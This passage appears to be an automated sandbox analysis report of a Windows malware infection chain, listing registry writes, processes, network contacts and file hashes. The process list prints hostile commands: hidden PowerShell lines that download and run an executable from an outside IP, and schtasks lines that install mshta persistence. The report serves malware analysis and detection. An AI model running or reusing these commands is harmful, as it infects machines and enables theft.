776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
"C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
"C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 500
C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"
C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
"C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=212
C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 208
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1036
C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe
"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"
C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"
C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1216
C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"
C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"
C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
"C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 852
C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe
"C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE
"C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "O5x0ImaVemy" /tr "mshta \"C:\Temp\8dw7RzrvO.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\8dw7RzrvO.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\system32\taskeng.exe
taskeng.exe {0102F77C-CFAE-4625-AABC-402260BBCF85} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
C:\ProgramData\djrq\nbiciq.exe
C:\ProgramData\djrq\nbiciq.exe
C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe
"C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 104.21.31.208:443 | explorebieology.run | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| N/A | 127.0.0.1:49647 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | drunkeflavorz.pw | udp |
| US | 104.21.31.208:443 | explorebieology.run | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
| MD5 | 42bcecbc4a9d0c9e72120f0a60102147 |
| SHA1 | 026d375bc2a684027fb8532af83ce2991509e1f1 |
| SHA256 | 303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b |
| SHA512 | d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498 |
\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
| MD5 | 3147e388f1f2ad94f26aee55a4267b8c |
| SHA1 | b3dfd5bb152b1b8e338586ea1e2d240cde6503b3 |
| SHA256 | 49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b |
| SHA512 | 720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9 |
memory/2780-15-0x0000000000CC0000-0x000000000115F000-memory.dmp
memory/1864-14-0x00000000064C0000-0x000000000695F000-memory.dmp
memory/1864-12-0x00000000064C0000-0x000000000695F000-memory.dmp
memory/1936-32-0x0000000000F00000-0x000000000139F000-memory.dmp
memory/2780-31-0x0000000006D40000-0x00000000071DF000-memory.dmp
memory/2780-29-0x0000000000CC0000-0x000000000115F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/2936-50-0x00000000011D0000-0x0000000001230000-memory.dmp
memory/2460-69-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2460-70-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-68-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-65-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-59-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-57-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-53-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-63-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-61-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-55-0x0000000000400000-0x0000000000429000-memory.dmp
memory/2460-72-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1936-76-0x0000000000F00000-0x000000000139F000-memory.dmp
memory/1936-77-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
| MD5 | 9dadf2f796cd4500647ab74f072fd519 |
| SHA1 | 92b6c95a6ed1e120488bd28ac74274e874f6e740 |
| SHA256 | e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76 |
| SHA512 | fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d |
memory/1936-93-0x0000000006A00000-0x0000000006EAC000-memory.dmp
memory/1936-94-0x0000000006A00000-0x0000000006EAC000-memory.dmp
memory/2196-95-0x0000000000260000-0x000000000070C000-memory.dmp
memory/1936-124-0x0000000000F00000-0x000000000139F000-memory.dmp
memory/1936-125-0x0000000006A00000-0x0000000006EAC000-memory.dmp
memory/1936-126-0x0000000006A00000-0x0000000006EAC000-memory.dmp
memory/2196-127-0x0000000000260000-0x000000000070C000-memory.dmp
memory/2196-129-0x0000000000260000-0x000000000070C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
| MD5 | 001d7acad697c62d8a2bd742c4955c26 |
| SHA1 | 840216756261f1369511b1fd112576b3543508f7 |
| SHA256 | de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af |
| SHA512 | f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb |
\Windows\Temp\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
| MD5 | eff9e9d84badf4b9d4c73155d743b756 |
| SHA1 | fd0ad0c927617a3f7b7e1df2f5726259034586af |
| SHA256 | d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad |
| SHA512 | 0006273c86e8130e06e705a2be46c3433c0d1b34463123354c1857ebf88503d6e7e90602dc40960351baa03155074f8c5834b251be9da90fd95b10e498a98a19 |
memory/1936-153-0x0000000000F00000-0x000000000139F000-memory.dmp
\Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\Quadrisyllable.dll
| MD5 | a1e561bc201a14277dfc3bf20d1a6cd7 |
| SHA1 | 1895fd97fb75ad6b59fc6d2222cf36b7dc608b29 |
| SHA256 | 7ae39cb5cd14a875af3e43df4a309d6a7a44c0339c413bf21b0300c84e35b66c |
| SHA512 | aaa4e7350094dc7574e5f18ce619f48a45062674353f0f2a340a1fea0055c7961a9b257455d8ea877d739635e3444df08f049484f48fa9729d8fb1667374cf3c |
\Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
| MD5 | 1f166f5c76eb155d44dd1bf160f37a6a |
| SHA1 | cd6f7aa931d3193023f2e23a1f2716516ca3708c |
| SHA256 | 2d13424b09ba004135a26ccd60b64cdd6917d80ce43070cbc114569eae608588 |
| SHA512 | 38ad8f1308fe1aae3ddf7dbc3b1c5442663571137390b3e31e2527b8fec70e7266b06df295df0c411fcc500424022f274fd467d36040def2e1a4feff88c749b7 |
memory/1864-176-0x0000000000400000-0x0000000000D48000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
| MD5 | 30c1a6337089e68b975438caebc8f497 |
| SHA1 | 2cf2324672cf72b9bc1869633f3bf6904bb61011 |
| SHA256 | db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017 |
| SHA512 | be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484 |
memory/1936-191-0x00000000063E0000-0x00000000066F1000-memory.dmp
memory/1952-194-0x00000000000F0000-0x0000000000401000-memory.dmp
memory/1936-192-0x00000000063E0000-0x00000000066F1000-memory.dmp
memory/1936-197-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/1936-217-0x00000000063E0000-0x00000000066F1000-memory.dmp
memory/1936-218-0x00000000063E0000-0x00000000066F1000-memory.dmp
memory/1952-219-0x00000000000F0000-0x0000000000401000-memory.dmp
memory/1936-220-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarAF0B.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
memory/1936-362-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe
| MD5 | 7ff72f21d83d3abdc706781fb3224111 |
| SHA1 | 3bfbe059b8e491bde4919fb29afa84d4ea1c0fa8 |
| SHA256 | 0c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea |
| SHA512 | dbb3c7b618bc2c80dae90ff902100d3902ddffe5705cf0c648b8b3f702fd8814b9cf66490e3260e09d36c1ce57bfc05d3f9bb0fc089c5ec7c553eb8a94d3320d |
memory/1936-376-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
| MD5 | 971c0e70de5bb3de0c9911cf96d11743 |
| SHA1 | 43badfc19a7e07671817cf05b39bc28a6c22e122 |
| SHA256 | 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d |
| SHA512 | a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2 |
memory/2808-388-0x000000013FC30000-0x000000013FDDE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
